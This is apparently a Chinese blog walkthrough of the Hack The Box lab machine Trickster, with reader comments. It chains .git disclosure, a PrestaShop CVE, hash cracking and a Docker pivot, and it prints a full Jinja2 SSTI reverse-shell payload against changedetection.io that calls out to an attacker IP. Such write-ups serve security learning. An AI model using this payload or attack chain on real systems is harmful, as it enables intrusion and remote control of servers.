HTB-Trickster

Box Info

OSLinux
DifficultyMedium

Git Hack

我在trickster的主域名发现了一个shop的子域名网站

这个shop看起来像是使用PrestaShop搭建,我搜索了一下相关的漏洞,无法直接使用

并且尝试了shop里的各种注入点,没有明显的漏洞,不过在我遍历目录的时候,发现了.git的目录

然后我使用Githack工具:lijiejie/GitHack: A `.git` folder disclosure exploit (github.com)

将这个目录作为url的路径,进入到了后台的登陆界面,并且得到PrestaShop的版本号为8.1.5

在之前的.git目录下我搜索到了一个admin_pannel,里面好像存在一个adam的用户

CVE-2024-34716

Githubaelmokhtar/CVE-2024-34716 (github.com)

得到www-data权限

在config里面找到一些信息

登录上mysql之后,在ps_employee表中发现james的密码hash

使用hashcat,破解除了james的密码:alwaysandforever

ssh登录上去,得到user.txt

Privilege Escalation

上传linpeas,发现当前服务器运行着docker

上传fscanReleases · shadow1ng/fscan (github.com),发现172.17.0.2主机

并且发现5000端口是打开的

将端口代理出来

进入到Change Detection

CVE-2024-32651

相关知识:CVE-2024-32651 –(Changedetection.io) – Hacktive 安全博客 (hacktivesecurity.com)

首先在kali上打开httpserver服务,并且添加到change detection

进入Edit,确保URL、Time、Send notification

然后进入notification,在Body处写入SSTI反弹shell的脚本

{{ self.__init__.__globals__.__builtins__.__import__('os').system('python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.30",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")\'') }}

然后保存即可

此处SSTI的原理是,这个服务会探测网站的变化,如果网站内容有变化那么就会触发通知信息

而Body是允许使用Jinja2模板来写内容

在kali上面,由于打开了80端口的httpserver服务,只需要写入一个index.html,并且不断修改他直到被检测到就行了

成功反弹到shell,但是没有root.txt呢?应该只是一个容器

使用history命令发现到密码,因为apt update需要管理员权限才能执行

使用密码切换到root用户,得到root.txt

Summary

Git文件泄露好久没遇到过,刚做的时候还没想到这个,去讨论区看了一下才发现

PrestaShop的Github CVE,在几天前是用不了的(不知道为什么),后来作者修改了一下又能正常使用了

history来查看密码泄露也是比较独特的点,之前也没想到

评论

  1. xianling88
    Linux Firefox
    2 月前
    2024-10-17 11:29:03

    不知道是不是有变化,现在我进去是.bash_history -> /dev/null,看不到history的命令了。目前还没找到提权的方法,不知道是不是作者更新了机器。

  2. xianling88
    Linux Firefox
    2 月前
    2024-10-17 13:01:39

    刚刚想办法给搞定了,得用这个shit:
    adam@trickster:~$ sudo -l
    Matching Defaults entries for adam on trickster:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin, use_pty
    User adam may run the following commands on trickster:
    (ALL) NOPASSWD: /opt/PrusaSlicer/prusaslicer

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇